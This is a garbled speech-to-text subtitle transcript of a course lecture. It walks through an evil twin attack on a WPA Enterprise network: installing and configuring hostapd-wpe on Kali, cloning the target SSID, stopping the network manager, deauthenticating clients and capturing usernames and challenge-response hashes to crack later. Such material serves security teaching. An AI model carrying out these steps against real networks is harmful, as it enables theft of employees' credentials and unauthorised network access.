1 00:00:01,200 --> 00:00:09,140 Okay now that we know the methods that we can use to gain access to WPA Enterprise Networks and this 2 00:00:09,140 --> 00:00:17,170 lecture I want to show you the more advanced method the one where we create a fake WPA enterprise network. 3 00:00:17,610 --> 00:00:19,170 So the first method. 4 00:00:19,290 --> 00:00:22,570 Like I said it just uses a traditional fake access point. 5 00:00:22,680 --> 00:00:30,330 And I covered this before in details I covered each aspect of learning this attack in details so that 6 00:00:30,330 --> 00:00:32,330 you can adapt it to any scenario. 7 00:00:32,550 --> 00:00:38,070 And this is a perfect example where you can use tools like Fluxion and wife fishier and you'll have 8 00:00:38,070 --> 00:00:39,150 to do it manually. 9 00:00:39,270 --> 00:00:41,880 And I covered how to do it manually before. 10 00:00:41,880 --> 00:00:46,610 That's why I'm going to be covering the more advanced method in this lecture. 11 00:00:47,070 --> 00:00:53,910 So I'm going to go to Cali and the first thing that I'm going to do is all need to install a modified 12 00:00:53,910 --> 00:00:56,460 version of host APD. 13 00:00:56,460 --> 00:01:01,010 So we use to host a PDA to generate the normal fake access point. 14 00:01:01,020 --> 00:01:10,020 Now there is a modified version called Host APD WPB and that version of host a PDA is designed to run 15 00:01:10,110 --> 00:01:15,500 a fake access point with WPA enterprise with free radius server. 16 00:01:16,020 --> 00:01:22,990 So first of all I'm going to have to update my sources so I'm going to do apt get update now that my 17 00:01:22,990 --> 00:01:24,120 sources are updated. 18 00:01:24,130 --> 00:01:30,640 I'm going to do apt get install followed by the program that I want to install which is called Host. 19 00:01:30,650 --> 00:01:33,680 AP The WP. 20 00:01:33,910 --> 00:01:36,140 So we always use apt get. 21 00:01:36,250 --> 00:01:43,320 We're just telling it to install on the package name or the program name it's called Host APD W.P.. 22 00:01:43,510 --> 00:01:49,900 I'm going to hit enter and that will automatically download the program all the needed packages and 23 00:01:49,900 --> 00:01:51,290 configure it for me. 24 00:01:53,480 --> 00:01:55,500 OK now that's all done. 25 00:01:55,520 --> 00:01:56,970 So I'm going to clear the screen. 26 00:01:58,600 --> 00:02:04,130 And the next thing that we want to do is very similar to what we used to do with host a PDA. 27 00:02:04,180 --> 00:02:11,030 We want to modify its configuration so to do that we're going to do a live pod which is my text editor 28 00:02:11,730 --> 00:02:22,300 and I'm going to put the location of the configuration file and that's stored in ATC host APD WP and 29 00:02:22,330 --> 00:02:25,810 again host APD the blue dot com. 30 00:02:27,870 --> 00:02:34,140 So we're doing Lafond which is our text editor and then we're given at the location of the configuration 31 00:02:34,140 --> 00:02:35,440 file for host. 32 00:02:35,440 --> 00:02:37,470 APD WPEC. 33 00:02:37,830 --> 00:02:43,760 I'm going to hit enter and the main things that you want to make sure are set correctly is first of 34 00:02:43,760 --> 00:02:45,040 all the interface. 35 00:02:45,140 --> 00:02:47,100 This is your wireless adapter. 36 00:02:47,240 --> 00:02:50,090 So in my case it's actually called Line 0. 37 00:02:50,120 --> 00:02:54,440 If you don't then what it's called You have to do if config as you should know by now and then you can 38 00:02:54,440 --> 00:02:56,210 get the name of it. 39 00:02:56,330 --> 00:03:00,100 The next thing that I want to modify is the SS ID. 40 00:03:00,170 --> 00:03:09,590 This is the name of the fake access point and it's set by default to be called Host APD WPEC. 41 00:03:09,620 --> 00:03:13,250 Now my target is called company network. 42 00:03:13,370 --> 00:03:19,400 So I'm going to call this company network as well because as you know this is an evil to an attack. 43 00:03:19,430 --> 00:03:25,390 So you want your fake access point to have the exact same name as the target access point. 44 00:03:25,620 --> 00:03:33,090 So call an IT company network you can also modify the channel and here if you want but I'm going to 45 00:03:33,090 --> 00:03:35,070 keep that the same. 46 00:03:35,070 --> 00:03:39,000 And I'm actually going to leave everything else here the same. 47 00:03:39,000 --> 00:03:43,300 Now if you scroll down you'll actually see after this point and it says is it. 48 00:03:43,500 --> 00:03:49,350 And it says it here and the comment everything that comes after here is literally just the normal host 49 00:03:49,380 --> 00:03:51,570 APD configuration. 50 00:03:51,570 --> 00:03:58,870 So like I said this is just a modified version of host APD which is modified so that it can use WPA 51 00:03:58,870 --> 00:04:02,350 a enterprise with free radius server. 52 00:04:03,000 --> 00:04:05,940 So I'm going to save this control apps and quit it. 53 00:04:05,940 --> 00:04:06,480 Control. 54 00:04:06,480 --> 00:04:08,300 Q OK. 55 00:04:08,400 --> 00:04:09,510 Now we're done. 56 00:04:09,600 --> 00:04:11,220 We're ready to run the attack. 57 00:04:11,400 --> 00:04:18,240 But before we do that like we did with host APD we have to stop the network manager because it's managing 58 00:04:18,240 --> 00:04:19,640 my wireless interface. 59 00:04:19,770 --> 00:04:24,650 And if it stays running it won't let me use it to create a fake access point. 60 00:04:25,050 --> 00:04:33,520 So I'm going to do service network manager stop this or stop the network manager for me. 61 00:04:33,700 --> 00:04:40,330 And now I can run the fake access point with WPA enterprise to do that. 62 00:04:40,330 --> 00:04:50,620 We're going to host a PDA WPEC followed by the location of the configuration file which is an ATC host 63 00:04:50,680 --> 00:04:56,860 APD WPEC host AP DWP either or CANF. 64 00:04:57,340 --> 00:05:02,230 So this command is actually very similar to the host APD command that we use to use. 65 00:05:02,290 --> 00:05:08,350 You just put the name of the tool followed by the location of the configuration file. 66 00:05:08,380 --> 00:05:15,970 I'm going to hit enter and as you can see right now it's still in me that the network is working its 67 00:05:15,990 --> 00:05:18,790 broadcast and under the name company network. 68 00:05:18,960 --> 00:05:26,760 And now you can just go ahead and run the authentication attack as I showed you before you can do authenticate 69 00:05:26,820 --> 00:05:28,360 all clients or some clients. 70 00:05:28,350 --> 00:05:34,200 Again as shown before clients will not be able to access their network they won't be able to use the 71 00:05:34,200 --> 00:05:34,840 network. 72 00:05:35,070 --> 00:05:39,550 So they'll think Oh maybe I can just connect to the other company network. 73 00:05:39,870 --> 00:05:44,690 So let's go to a Windows machine and see what we have. 74 00:05:47,080 --> 00:05:49,400 So I have my company network in here. 75 00:05:49,780 --> 00:05:51,060 I'm going to connect to us. 76 00:05:53,910 --> 00:06:02,400 And I'm going to put my user name as zayd and my password as one two three four A B C D. 77 00:06:02,600 --> 00:06:05,120 I'm going to connect. 78 00:06:05,300 --> 00:06:10,480 Now this is just a warning saying that if you expect to see this network then connect to it. 79 00:06:10,520 --> 00:06:11,870 Otherwise don't. 80 00:06:12,110 --> 00:06:19,670 Most people would just connect to it because like I said WPA enterprise is usually used in large organizations. 81 00:06:19,760 --> 00:06:25,520 So people are used to see a number of routers and connecting to a number of routers and if you're on 82 00:06:25,580 --> 00:06:30,290 the authentication attack and they can't connect to their own router then there is a very high chance 83 00:06:30,290 --> 00:06:35,870 of them trying to connect to the other router or the other to the other access point that has the exact 84 00:06:35,870 --> 00:06:38,470 same name that they're used to. 85 00:06:38,480 --> 00:06:45,310 Therefore I'm going to click on Connect now saying it can't connect to this network because I actually 86 00:06:45,310 --> 00:06:47,530 use the wrong username and password anyway. 87 00:06:47,800 --> 00:06:55,270 But if we go to the Kalli machine you'll see that we captured the username we captured the challenge 88 00:06:55,600 --> 00:06:58,240 and we captured the response. 89 00:06:58,240 --> 00:07:03,850 Now I know this is not the password that I put so you still can't see one two three four a b c d and 90 00:07:03,850 --> 00:07:06,300 that's because the password is encrypted. 91 00:07:06,610 --> 00:07:13,810 That's why I said the basic evil twin method that we showed before has an advantage over this method 92 00:07:13,810 --> 00:07:19,000 because the password will be sent in plain text overhasty TTP. 93 00:07:19,060 --> 00:07:25,360 The problem with that method was the logon screen wasn't very convincing with this method. 94 00:07:25,360 --> 00:07:32,580 You'll get a proper system log in box because we are implementing a proper WPA enterprise network. 95 00:07:32,650 --> 00:07:34,680 So there's nothing fake about it. 96 00:07:34,690 --> 00:07:41,800 The only problem is because this is a proper WPA a enterprise network the password will be sent. 97 00:07:41,800 --> 00:07:48,370 Based on the authentication method used which is a challenge response method where there either sense 98 00:07:48,430 --> 00:07:53,100 a challenge and then the client sends a response based on that. 99 00:07:53,410 --> 00:07:57,520 Now in the next section I'm going to talk more about this and I'm going to show you how to crack the 100 00:07:57,520 --> 00:08:00,920 response and get the key for the network. 101 00:08:01,150 --> 00:08:03,530 But for now our attack is done. 102 00:08:03,580 --> 00:08:07,380 We managed to capture the username and the hash for that password. 103 00:08:07,570 --> 00:08:10,420 And in the next lecture I'm going to show you how to crack that password.